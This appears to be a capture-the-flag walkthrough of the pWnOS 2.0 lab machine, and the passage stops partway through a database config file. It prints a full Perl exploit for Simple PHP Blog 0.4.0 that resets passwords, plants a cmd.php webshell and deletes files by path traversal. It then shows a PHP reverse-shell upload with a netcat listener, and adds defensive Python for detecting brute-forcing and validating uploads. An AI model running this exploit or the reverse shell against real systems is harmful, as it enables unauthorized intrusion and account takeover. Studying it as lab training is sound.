0x00 Attack Path

Web directory brute-forcing (gobuster) → CMS vulnerability (Simple PHP Blog) → image-upload flaw to get a shell → SQL configuration leak

0x01 Reconnaissance

After booting the target VM, run the following command on the attacking machine; otherwise the target is unreachable. One caveat: if the attacking machine is itself a VMware VM, back up its .vmx file first. If the attacker later loses Internet access, swap the backup back in and rebuild the VM.

sudo ifconfig eth0 10.10.10.101 up

On VulnHub it is stated that the target's IP is fixed at 10.10.10.100.

└─$ nmap -sP 10.10.10.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 06:19 EST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.10.100
Host is up (0.0046s latency).
Nmap scan report for 10.10.10.101
Host is up (0.00083s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 16.60 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -T4 -A -p- 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 06:20 EST
Nmap scan report for 10.10.10.100
Host is up (0.00088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
MAC Address: 00:0C:29:90:98:5E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

Port 80 is open, so have a look at the website:

As usual, a nikto directory brute-force:

┌──(kali㉿kali)-[~]
└─$ nikto -h http://10.10.10.100        
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.100
+ Target Hostname:    10.10.10.100
+ Target Port:        80
+ Start Time:         2022-11-27 01:29:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 8673 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2022-11-27 01:29:56 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

gobuster is another directory brute-forcing tool. Besides the target URL it takes a wordlist and a list of extensions to probe, and its output is tidier than nikto's.

┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
└─$ gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,old,zip,gz,conf,cnf,js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,bak,js,old,zip,gz,conf,cnf
[+] Timeout:                 10s
===============================================================
2022/11/27 02:23:16 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 854]
/index.php            (Status: 200) [Size: 854]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]                                                                           
/login                (Status: 200) [Size: 1174]
/login.php            (Status: 200) [Size: 1174]
/register.php         (Status: 200) [Size: 1562]
/register             (Status: 200) [Size: 1562]
/info.php             (Status: 200) [Size: 49885]
/info                 (Status: 200) [Size: 49873]
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]                                                                       
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]                                                                         
/activate.php         (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]                                                                         
/server-status        (Status: 403) [Size: 293]
Progress: 2204026 / 2205610 (99.93%)===============================================================
2022/11/27 02:31:11 Finished
===============================================================
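From the defender's side, a gobuster run like the one above leaves a very recognisable trace in the Apache access log: one client, dozens to thousands of distinct paths, almost all answered 404, within seconds. The following Python is an added example (not part of the original write-up and not gobuster code) that flags such clients from combined-format log lines. The log lines are constructed here to imitate this scan, reusing the gobuster/3.3 user agent shown in the output above; the 60-second window and the 10-request threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" log format, the default for the Apache 2.2 seen on the target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log: one normal visitor and one client behaving like the
# gobuster run above (user agent gobuster/3.3, dozens of 404s within seconds).
SAMPLE_LOG = [
    '10.10.10.50 - - [27/Nov/2022:02:20:01 -0500] "GET /index.php HTTP/1.1" 200 854 "-" "Mozilla/5.0"',
    '10.10.10.50 - - [27/Nov/2022:02:20:09 -0500] "GET /favicon.ico HTTP/1.1" 404 293 "-" "Mozilla/5.0"',
] + [
    f'10.10.10.101 - - [27/Nov/2022:02:23:{16 + i // 8:02d} -0500] '
    f'"GET /{word}.php HTTP/1.1" 404 293 "-" "gobuster/3.3"'
    for i, word in enumerate([
        "admin", "backup", "test", "old", "conf", "db", "data", "tmp",
        "cgi", "api", "dev", "secret", "private", "wp", "new", "stats",
        "users", "cache2", "log", "shell", "cmd", "upload", "files", "setup",
    ])
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_dir_bruteforce(lines, window_s=60, threshold=10):
    """Flag clients that produce at least `threshold` 404 responses inside any
    `window_s`-second sliding window. Returns {ip: summary} for flagged clients."""
    state = defaultdict(lambda: {"window": deque(), "notfound": 0,
                                 "paths": set(), "agents": set(), "flagged": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        st = state[rec["ip"]]
        st["notfound"] += 1
        st["paths"].add(rec["path"])
        st["agents"].add(rec["ua"])
        win = st["window"]
        win.append(rec["ts"])
        # Drop timestamps that fell out of the window (the line just appended always stays).
        while (rec["ts"] - win[0]).total_seconds() > window_s:
            win.popleft()
        if len(win) >= threshold:
            st["flagged"] = True
    return {
        ip: {"notfound": st["notfound"],
             "distinct_paths": len(st["paths"]),
             "agents": sorted(st["agents"])}
        for ip, st in state.items() if st["flagged"]
    }


if __name__ == "__main__":
    for ip, summary in detect_dir_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {summary['notfound']} x 404 over {summary['distinct_paths']} paths, "
              f"agents={summary['agents']}")
```

The user agent is only reported, never used as the trigger: gobuster and nikto both let the operator change it, so the 404 rate per client is the signal worth alerting on. The same output shows why the scan found so much on this box: the rate is not limited and the server answers every probe.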

The output above shows a directory named blog; open it in the browser. If the blog is built on an off-the-shelf CMS, there may be a ready-made exploit script for it.

In the page source (red circle in the screenshot), the short name sphpblog is visible.

0x02 Get Shell

┌──(kali㉿kali)-[~]
└─$ searchsploit sphpblog
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Ex | php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multipl | php/webapps/4557.txt
SPHPBlog 0.4 - 'search.php' Cross-Site Scr | php/webapps/25423.txt
Sphpblog 0.8 - Multiple Cross-Site Scripti | php/webapps/29051.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Searching by the short name returns few results, but it reveals the full name, Simple PHP Blog. Search again with the full name:

┌──(kali㉿kali)-[~/target-machine/pWnOSv2.0]
└─$ searchsploit Simple PHP Blog
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Insanely Simple Blog 0.4/0.5 - 'index.php' | php/webapps/30317.txt
Insanely Simple Blog 0.4/0.5 - Cross-Site  | php/webapps/30318.txt
Insanely Simple Blog 0.5 - SQL Injection   | php/webapps/5774.txt
Simple Blog PHP 2.0 - Multiple Vulnerabili | php/webapps/40518.txt
Simple Blog PHP 2.0 - SQL Injection        | php/webapps/40519.txt
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Ex | php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multipl | php/webapps/4557.txt
Simple PHP Blog 0.4 - 'colors.php' Multipl | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Mu | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi. | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s  | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Exe | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command E | php/webapps/1581.pl
Simple PHP Blog 0.5.1 - Local File Inclusi | php/webapps/10604.pl
Simple PHP Blog 0.5.x - 'search.php' Cross | php/webapps/33507.txt
Simple PHP Blog 0.8.4 - Cross-Site Request | php/webapps/40475.txt
SimpleBlog 2.0 - 'comments.asp' SQL Inject | php/webapps/2232.pl
SimpleBlog 3.0 - Database Disclosure       | php/webapps/7232.txt
Super Simple Blog Script 2.5.4 - 'entry' S | php/webapps/9180.txt
Super Simple Blog Script 2.5.4 - Local Fil | php/webapps/9179.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

The version is still unknown; inspecting the page source more closely shows it is 0.4.0.

So 1191 and 16883 are the two usable entries. The second is an .rb file and probably needs Metasploit, so try the first one.

└─$ cat 1191.pl
#!/usr/bin/perl -w
#===============================================================================
#       Title:          sphpblog_vulns.pl
#
#       Written by:     Kenneth F. Belva, CISSP
#                       Franklin Technologies Unlimited, Inc.
#                       http://www.ftusecurity.com
#
#       Date:           August 25, 2005
#
#       Version:        0.1
#
#       Description:    This program is for educational purposes only!
#                       SimplePHPBlog as a few vulnerability which this
#                       perl script demonstrates via an exploit.
#
#       Instructions:   Should be self-explanatory via the .pl help menu
#
#       Solutions:
#                       *** Solution 1
#                       Change the line in comment_delete_cgi.php from
#                       $logged_in = logged_in( false, true );    to
#                       $logged_in = logged_in( true, true );
#
#                       *** Solution 2
#                       Place an .htaccess file with the following config in
#                       the ./config directory:
#
#
#                       #---------------------
#                       #Snip .htaccess start
#                       #---------------------
#                       IndexIgnore *
#
#                       <Files .htaccess>
#                       order allow,deny
#                       deny from all
#                       </Files>
#
#                       <Files *.txt>
#                       order allow,deny
#                       deny from all
#                       </Files>
#                       #---------------------
#                       #Snip .htaccess end
#                       #---------------------
#
#
#                       *** Solution 3
#                       See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#                               for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#       Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
#       Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
                   $unix="0"; #windows system
            }else{
                    $unix="1"; #unix system
            }

#-------------------------------------------------------------------------------
#       The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
            if ($unix){system("clear");}
                else{system("cls");}

            print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : $0
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1
        ";

        exit;
    }


#-------------------------------------------------------------------------------
#       Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

        use Switch;

        # colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();

        #Load parameters
        my $exploit = $args{e};
        my $host = $args{h};
        my $user = $args{U};
        my $pass = $args{P};
        my $file = $args{F};

        # What shall we do today?
        switch (%args) {
                case "?"        { menu();}
                case "e"        {
                                switch ($exploit) {

                                        if ($unix){system("clear");}
                                        else{system("cls");}

                                        print "
________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________";


                                        # Upload cmd.php to /images
                                        case "1" {      print "\nRunning cmd.php Upload Exploit....\n\n";
                                                        &UploadCmdPHP($host);}
                                        # Retrieve Username & Password hash
                                        case "2" {      print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
                                                        &RetrievePwd($host."/config/password.txt");}
                                        # Replace Username and Password
                                        case "3" {      print "\nRunning Set New Username and Password Exploit....\n\n";
                                                        &SetUserPwd($host,$user,$pass);}
                                        # Delete a System File
                                        case "4" {      print "\nRunning Delete System File Exploit....\n\n";
                                                        &DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

                                        } #end $exploit switch
                                        print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
                                } #end "e" case
                else            { menu();}
                } #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#       Exploit #1: Upload File Via POST
#-------------------------------------------------------------------------------

sub UploadCmdPHP {


        my($url) = @_;

        use LWP;
        use HTTP::Request::Common qw(POST);
        my $ua = LWP::UserAgent->new;

        $HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

        #Step 1: Retrieve hash
        #-----------------------------------------------------------------------
        my $hash = &RetrievePwd($url."/config/password.txt");


        #Step 2: Delete Existing Password file (SetUserPwd)
        #Step 3: Create a temporary user id and password (SetUserPwd)
        #-----------------------------------------------------------------------
        &SetUserPwd($url,"a","a");


        #Step 4: Log into the app and get the PHPSession / my_id session variable
        #-----------------------------------------------------------------------
        my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));


        #Step 5: Create and upload our scripts (cmd.php & reset.php)
        #-----------------------------------------------------------------------
                &CreateTempPHPs();

        # Upload cmd.php
        my $path = "./cmd.php";
        my $file = "cmd.php";
        my $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );

        my $response = $ua->request($req);
        print "\nCreated cmd.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", $response->status_line;
        #return $response->as_string;

        # Upload reset.php
        $path = "./reset.php";
        $file = "reset.php";

        $req = POST($url."/upload_img_cgi.php",
                Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
                Content_Type => 'form-data',
                Content => [userfile => [$path,$file],],
                );

        $response = $ua->request($req);
        print "\nCreated reset.php on target host: " . $url;
        #$response->is_success or die "Failed to POST '$url': ", $response->status_line;
        #return $response->as_string;

                #Remove local PHP files
                &RemoveTempPHPs();


        #Step 6: Reset origional Passwpord
        #-----------------------------------------------------------------------
        &ResetHash($url."/images/reset.php",$hash);


        #Step 7: Pass command to delete reset.php (clean up)
        #-----------------------------------------------------------------------
        &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
        print "\nRemoved reset.php from target host: " . $url;

        print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#       Exploit #2: Retrieve Password File
#-------------------------------------------------------------------------------

sub RetrievePwd {

        my($url) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url);

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        my $hash = $response->content;
        print "\nRetrieved Username and Password Hash: " . $hash;
        return $hash

}


#-------------------------------------------------------------------------------
#       Exploit #3: Set New Username and Password
#-------------------------------------------------------------------------------

sub SetUserPwd{

        my($url,$user,$pass) = @_;

        &DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
        &ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#       POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {

        my($url,$user,$pass) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\n./config/password.txt created!";
        print "\nUsername is set to: ".$user;
        print "\nPassword is set to: ".$pass;

}


#-------------------------------------------------------------------------------
#       Exploit #4: Delete Password File
#-------------------------------------------------------------------------------

sub DeleteFile {

        my($url,$file) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = GET($url.$file);

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;
        print "\nDeleted File: ".$file;

}


#-------------------------------------------------------------------------------
#       log into site
#-------------------------------------------------------------------------------

sub Login {

        my($url,$user,$pass) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ user  => $user,
                        pass => $pass,
                        submit => '%C2%A0Submit%C2%A0'
                        ]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\nLogged into SimplePHPBlog at: ".$url;
        print "\nCurrent Username '".$user."' and Password '".$pass."'...";

        return $response->header('Set-Cookie');

}


#-------------------------------------------------------------------------------
#       POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

        my($url,$hash) = @_;

        use LWP;
        use HTTP::Request::Common;
        my $ua = LWP::UserAgent->new;

        my $req = POST($url,
                      [ hash  => $hash]
                );

        my $response = $ua->request($req);

        $response->is_success or die "Failed to POST '$url': ", $response->status_line;

        print "\nReset Hash at: ".$url;
        print "\nReset Hash value: ".$hash;


}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

        my($hash) = @_;

        open(PHPFILE, ">./cmd.php");
        print PHPFILE &CreateCmdPHP();
        close PHPFILE;
        print "\nCreated cmd.php on your local machine.";

        open(PHPFILE, ">./reset.php");
        print PHPFILE &CreateResetPHP();
        close PHPFILE;
        print "\nCreated reset.php on your local machine.";
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

        unlink("./cmd.php");
        print "\nRemoved cmd.php from your local machine.";
        unlink("./reset.php");
        print "\nRemoved reset.php from your local machine.";

}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {

        my($savedata) = @_;

        my $PHPstring = "PHPSESSID";
        my $semi = "\;";

        my $datalength = length($savedata);
        my $PHPstart= (index $savedata, $PHPstring)+10;
        my $PHPend = index $savedata,$semi,$PHPstart;
        my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
        return $PHPsession;

}


sub CreateCmdPHP(){

        return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end

}


sub CreateResetPHP(){

        return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
#       Begin Routines
#------------------------------------------------------
        init();

# milw0rm.com [2005-09-01]

That is long, but the part that matters is the script's usage text:

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : $0
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : $0 [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: $0 -h 127.0.0.1 -e 2
                  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
                  $0 -h 127.0.0.1 -e 4 -F ./index.php
                  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  $0 -h 127.0.0.1 -e 1

Start with option 3 and create a new account. Here both the username and the password are set to admin:

┌──(kali㉿kali)-[~]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

┌──(kali㉿kali)-[~]
└─$

Try the login page:

Login succeeded:

There is an image upload feature; see whether a reverse shell can be uploaded:

It needs editing before uploading:

┌──(kali㉿kali)-[~]
└─$ sudo vim /usr/share/webshells/php/php-reverse-shell.php
[sudo] password for kali:

Change the IP at the red circle to the attacking machine's IP; the port on the next line is 1234, note it down:

The upload page:

In the directory (how was this directory known?), the uploaded file is indeed there:

Listen on port 1234 on the attacking machine first, then open the uploaded file to get a shell:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.10.101] from (UNKNOWN) [10.10.10.100] 59016
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 14:27:57 up  1:05,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")' 
www-data@web:/$
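The shell above exists because the blog stored the uploaded file under its client-supplied .php name in a directory the web server executes. The following Python is an added example, not code from the original post or from Simple PHP Blog, of the server-side checks that close that path: a last-extension allowlist, a magic-byte check against the declared type, rejection of embedded script markers (a valid GIF header followed by PHP is still PHP to mod_php), and a server-chosen random filename. The allowlist, the size limit and the marker list are my assumptions; the sample uploads are constructed.

```python
import os
import secrets

# Allowlist of image extensions and the magic bytes each must start with (assumed policy).
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit
# A valid GIF header followed by "<?php" is still a PHP script once a script-enabled
# directory serves it, so any server-side code marker inside an "image" is rejected.
CODE_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_image_upload(client_name, data):
    """Return (accepted, stored_name_or_reason).

    Only the final extension of the client-supplied name is consulted; the rest of
    that name is never reused, so 'shell.php.jpg' or 'x.phtml' cannot influence how
    the server later treats the file.
    """
    if len(data) > MAX_BYTES:
        return False, "file too large"
    ext = os.path.splitext(client_name)[1].lstrip(".").lower()
    if ext not in ALLOWED:
        return False, f"extension '.{ext}' not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match the declared image type"
    if any(marker in data for marker in CODE_MARKERS):
        return False, "embedded script markers found"
    # Server-chosen random name: nothing attacker-controlled reaches the filesystem.
    return True, f"{secrets.token_hex(16)}.{ext}"


# Constructed sample uploads, from the reverse-shell case on this box to a benign photo.
SAMPLES = {
    "php-reverse-shell.php": b"<?php echo 'shell'; ?>",
    "shell.php.jpg":         b"<?php echo 'shell'; ?>",
    "polyglot.gif":          b"GIF89a\x01\x00\x01\x00<?php echo 'shell'; ?>",
    "PHOTO.JPG":             b"\xff\xd8\xff\xe0" + b"\x00" * 64,
}


def run_samples():
    """Validate every sample and return {client_name: accepted}."""
    return {name: validate_image_upload(name, data)[0] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:24} -> {validate_image_upload(name, data)}")
```

Validation alone is not the last line of defence: the upload directory should not execute scripts at all (with mod_php, php_admin_flag engine off for that directory, or better, storing uploads outside the document root and serving them through a handler), so that any bypass of these checks yields a stored file rather than code execution. The same goes for the directory listing that let the uploaded file be found: Options -Indexes removes it.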

0x03 Privilege Escalation

Look for anything usable for privilege escalation, such as database credentials, or a sudo -l entry that allows editing an important file with root privileges.

ToDo: where do common SQL configuration files live?

www-data@web:/$ ls
ls
bin   dev  home        lib    lost+found  mnt  proc  sbin     srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  selinux  sys  usr  vmlinuz
www-data@web:/$ pwd
pwd
/
www-data@web:/$ cd /var
cd /var
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cd www
cd www
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
